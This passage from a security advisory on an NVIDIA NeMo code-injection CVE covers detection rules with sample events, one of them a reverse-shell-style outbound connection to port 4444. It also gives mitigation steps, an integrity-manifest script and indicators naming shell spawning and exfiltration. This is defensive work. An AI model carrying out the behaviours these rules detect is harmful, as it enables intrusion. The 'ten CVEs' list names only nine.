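     "Initiated": "true", "DestinationIp": "203.0.113.5", "DestinationPort": 4444},
    # n2: checkpoint download over HTTPS -> expected port, no alert
    {"id": "n2", "Image": "/usr/bin/python3",
     "CommandLine": "python3 -m nemo.collections.llm.train",
     "Initiated": "true", "DestinationIp": "198.51.100.10", "DestinationPort": 443},
    # n3: inbound accept on a rendezvous socket -> not initiated, no alert
    {"id": "n3", "Image": "/usr/bin/python3", "CommandLine": "python3 nemo_train.py",
     "Initiated": "false", "DestinationIp": "10.0.0.7", "DestinationPort": 51234},
]


def run_rules(process_events=PROCESS_EVENTS, network_events=NETWORK_EVENTS):
    """Return {event_id: [rule names]} for every event that fired a rule."""
    alerts = {}
    for ev in process_events:
        if rule1_child_process(ev):
            alerts.setdefault(ev["id"], []).append("rule1")
    for ev in network_events:
        if rule2_outbound(ev):
            alerts.setdefault(ev["id"], []).append("rule2")
    return alerts


if __name__ == "__main__":
    for event_id, rules in run_rules().items():
        print(event_id, "->", ", ".join(rules))
```

The p2 hit is the tuning problem in miniature: exclude it by child command line (the worker script) or by parent image (torchrun's own launcher), not by dropping the python child from the rule, since an injected payload that spawns python is exactly what the rule exists to catch.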

Detection Gaps

#  | Gap                                                              | Impact                                                                          | Resolution Path
G1 | Specific NeMo internal function and code path not publicly known | Rules rely on post-exploitation behaviour; may miss novel delivery variants     | Monitor NVD, NVIDIA GitHub (NVIDIA-NeMo/NeMo), and security research for technical disclosure
G2 | File format and field used for injection not identified          | Rule 3 covers plausible directories but cannot target the exact file type      | Review NeMo 2.6.1 patch diff on GitHub for the fixed code path
G3 | Privilege escalation mechanism not described in advisory         | No rule covers the escalation step                                              | Monitor for CVE technical write-ups
G4 | Windows and macOS variants not covered                           | Rules are Linux-only; NeMo also runs on Windows with CUDA                       | Add Windows Sysmon equivalents once attack vector is confirmed
G5 | Container and Kubernetes detection absent                        | NeMo is commonly deployed in containerised ML environments                      | Add Falco or container-aware rules once advisory details are clarified
G6 | No YARA rule provided                                            | File-based scanning requires knowledge of the injection format                  | Defer until G2 is resolved

Detection & Mitigation

Immediate Actions

  1. Upgrade to nemo-toolkit 2.6.1 or later -- This is the primary remediation. Install via PyPI: pip install --upgrade nemo-toolkit (NVIDIA Advisory a_id/5762; PyPI: nemo-toolkit). At time of writing, the latest available version is 2.7.0, released 26 February 2026 (PyPI: nemo-toolkit).

  2. Audit all ten CVEs in the February 2026 bulletin -- Review the full set of vulnerabilities for additional exposure in your environment: CVE-2025-33241, CVE-2025-33243, CVE-2025-33245, CVE-2025-33246, CVE-2025-33249, CVE-2025-33250, CVE-2025-33251, CVE-2025-33252, CVE-2025-33253 (NVIDIA Advisory a_id/5762).

  3. Restrict local access to NeMo training environments -- If an immediate upgrade is not feasible, limit which users can submit training jobs, data, or configuration files to shared NeMo installations.

Detection Guidance

  • Process monitoring -- Deploy Sigma Rules 1 and 5 on hosts running NeMo to detect unexpected child processes and dynamic code evaluation patterns. Requires endpoint telemetry (Sysmon on Windows, auditd or osquery on Linux).
  • File integrity monitoring -- Deploy Sigma Rule 3 to detect unexpected file drops in NeMo working directories. Tune directory paths to match the target environment.
  • Posture scanning -- Use Sigma Rule 4 or an equivalent package audit to identify unpatched NeMo installations across the estate.
  • Network monitoring -- Deploy Sigma Rule 2 to detect anomalous outbound connections from NeMo processes. Define an allow-list of legitimate egress destinations and ports for the environment.

Strategic Recommendations

  • Establish AI/ML framework vulnerability monitoring -- NeMo has had at least fourteen high-severity CVEs across three consecutive security bulletins (November 2025, December 2025, February 2026) (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762). Include NeMo and comparable frameworks (PyTorch, TensorFlow, Hugging Face Transformers) in your regular vulnerability scanning cycle.
  • Implement integrity checks on training data and model artefacts -- Cryptographic hashing or signing of datasets and checkpoint files processed by NeMo can help detect tampering before processing.
  • Segment ML training infrastructure -- Isolate ML training environments from production networks and sensitive data stores to limit the impact of code execution within a training node.
  • Assess insider threat exposure in shared ML environments -- The local attack vector with low-privilege requirements (NVD CVSS vector) is consistent with scenarios where data scientists, ML engineers, or automated pipelines share access to training infrastructure (RAXE assessment).
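The integrity-check recommendation above is only useful if the manifest itself cannot be rewritten by whoever dropped the malicious file, and if verification also catches files that were added rather than modified. The following is an added example for this advisory, not NeMo functionality: it builds a SHA-256 manifest of a dataset directory, authenticates the manifest with HMAC-SHA256, and verifies both before a pipeline reads the files. The key, directory layout and sample files are constructed; in production the manifest would be signed with an asymmetric key held by the data owner, since a local user on the training node could otherwise read the HMAC key and re-sign a tampered directory.

```python
"""Integrity manifest for training data and checkpoints.

Added example for this advisory, not NeMo functionality. Builds a SHA-256
manifest of every file under a directory, authenticates the manifest with
HMAC-SHA256, and verifies both before a pipeline reads the files. The key,
layout and sample files are constructed; production use would sign the
manifest with an asymmetric key held off the training node.
"""
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


def _sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, key):
    """Hash every regular file under root (relative POSIX paths) and MAC the result."""
    root = Path(root)
    files = {p.relative_to(root).as_posix(): _sha256_file(p)
             for p in sorted(root.rglob("*")) if p.is_file()}
    body = json.dumps({"files": files}, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return {"body": body, "mac": tag}


def verify_manifest(root, manifest, key):
    """Return (ok, problems). MAC first, then per-file hashes, then extra files;
    an unexpected file is reported because a dropped script is an injection path."""
    expected = hmac.new(key, manifest["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["mac"]):
        return False, ["manifest MAC invalid"]
    files = json.loads(manifest["body"])["files"]
    root = Path(root)
    problems = []
    for rel, digest in files.items():
        p = root / rel
        if not p.is_file():
            problems.append(f"missing: {rel}")
        elif not hmac.compare_digest(_sha256_file(p), digest):
            problems.append(f"modified: {rel}")
    on_disk = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
    for rel in sorted(on_disk - files.keys()):
        problems.append(f"unexpected: {rel}")
    return not problems, problems


def demo():
    """Constructed scenario: sign a dataset directory, then tamper with it."""
    key = b"constructed-demo-key-not-for-production"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "train.jsonl").write_text('{"text": "hello"}\n')
        (root / "config.yaml").write_text("batch_size: 16\n")
        manifest = build_manifest(root, key)
        clean_ok, _ = verify_manifest(root, manifest, key)
        # Tamper: edit the config and drop an extra script into the directory.
        (root / "config.yaml").write_text("batch_size: 16\nhook: evil\n")
        (root / "setup.py").write_text("import os\n")
        tampered_ok, problems = verify_manifest(root, manifest, key)
        # Forge: attacker re-hashes the tampered directory but lacks the key,
        # so the old MAC no longer covers the new body.
        forged = {"body": build_manifest(root, b"wrong-key")["body"],
                  "mac": manifest["mac"]}
        forged_ok, forged_problems = verify_manifest(root, forged, key)
    return {"clean_ok": clean_ok, "tampered_ok": tampered_ok, "problems": problems,
            "forged_ok": forged_ok, "forged_problems": forged_problems}


if __name__ == "__main__":
    print(demo())
```

Run verification on the node immediately before the training job opens the directory, and fail closed: a manifest that does not verify should abort the job rather than log a warning, since the whole point is to keep a crafted file from reaching the parser.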

Indicators of Compromise

Type          | Indicator                                                                                                              | Context
Behavioural   | Process tree: python/python3 (NeMo) spawning unexpected shell (bash, sh, dash)                                        | Post-exploitation child process consistent with CWE-94 (NVD)
Behavioural   | Dynamic import or compile calls on command line co-located with NeMo module references                                 | Exploitation trigger pattern (CWE-94 definition)
Behavioural   | Outbound network connections from NeMo process to non-standard ports                                                   | Possible data exfiltration or reverse shell -- speculative, not confirmed by advisory (RAXE assessment based on CWE-94 post-exploitation patterns)
File          | Script or binary files (.sh, .py, .so, .elf) appearing in NeMo working directories (nemo_experiments, nemo_checkpoints, nemo_datasets) | Possible persistence artefact following code injection -- speculative, not confirmed by advisory (RAXE assessment based on CWE-94 post-exploitation patterns)
Configuration | nemo-toolkit version prior to 2.6.1 installed on any host                                                              | Vulnerable installation (NVIDIA Advisory a_id/5762)

Note: All behavioural indicators above are advisory-derived inferences from the CWE-94 classification and CVSS impact ratings. No indicators have been validated against a live exploit. The specific injection file format is not publicly known.


Strategic Context

The following observations place the NVIDIA NeMo Framework code injection vulnerability in broader context. All strategic interpretation in this section is RAXE assessment unless otherwise sourced.

AI framework security exposure is increasing (RAXE assessment). The NeMo Framework is used for training and fine-tuning large language models, speech recognition systems, and multimodal AI applications within NVIDIA's AI ecosystem (NVIDIA). As organisations adopt AI/ML infrastructure, the security posture of these frameworks becomes relevant to enterprise risk. A code injection vulnerability in a training framework can compromise model integrity, training data confidentiality, and the computational resources involved (RAXE assessment).

Recurring NeMo CVEs indicate a pattern worth monitoring (RAXE assessment). The three consecutive security bulletins (November 2025, December 2025, February 2026) have disclosed at least fourteen high-severity vulnerabilities in the NeMo Framework, with the February 2026 batch alone addressing ten CVEs (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762). The persistence of the same weakness categories -- CWE-94 (code injection) and CWE-502 (deserialisation) -- across all three bulletins suggests that the underlying input validation architecture may require structural remediation beyond individual patch fixes (RAXE assessment). Organisations using NeMo should maintain an aggressive patching cadence for this framework (RAXE assessment).

Possible supply chain implications for ML pipelines (RAXE assessment). The local attack vector, combined with the ability to trigger exploitation through malicious data files processed by the framework, creates a potential supply chain risk for organisations that ingest external training data, pre-trained models, or configuration files from third-party sources. This aligns with the broader trend of ML supply chain attacks documented in the MITRE ATLAS framework, where adversaries target model and data pipelines rather than the application layer (RAXE assessment).

Potential regulatory relevance (RAXE assessment). The EU AI Act and comparable regulatory frameworks are establishing requirements for AI system security assessments. Frameworks like NeMo, which process training data and produce models deployed in regulated contexts (healthcare, finance, autonomous systems), may fall under compliance requirements for vulnerability management and supply chain security. The high-severity nature of these vulnerabilities and the batch disclosure pattern are the type of findings that regulatory auditors may scrutinise (RAXE assessment).


References

  1. CVE-2025-33236 -- NVD entry, CVSS 7.8 HIGH, CWE-94 (NVD)
  2. NVIDIA Security Bulletin a_id/5762 -- February 2026 vendor advisory, 10 NeMo Framework CVEs (NVIDIA Advisory a_id/5762)
  3. GHSA-f86v-54pm-58q4 -- GitHub Security Advisory for CVE-2025-33236 (GHSA)
  4. CWE-94: Improper Control of Generation of Code -- MITRE CWE definition
  5. nemo-toolkit on PyPI -- Package registry; version 2.6.1 released 2026-01-09 (PyPI)
  6. NVIDIA Security Bulletin a_id/5718 -- November 2025 vendor advisory, 2 NeMo Framework CVEs (NVIDIA Advisory a_id/5718)
  7. NVIDIA Security Bulletin a_id/5736 -- December 2025 vendor advisory, 2 NeMo Framework CVEs (NVIDIA Advisory a_id/5736)
  8. NVIDIA Product Security Acknowledgements -- Reporter credit: Inga Cherny, Cato CTRL (NVIDIA Acknowledgements)
  9. FIRST EPSS -- Exploit Prediction Scoring System data for CVE-2025-33236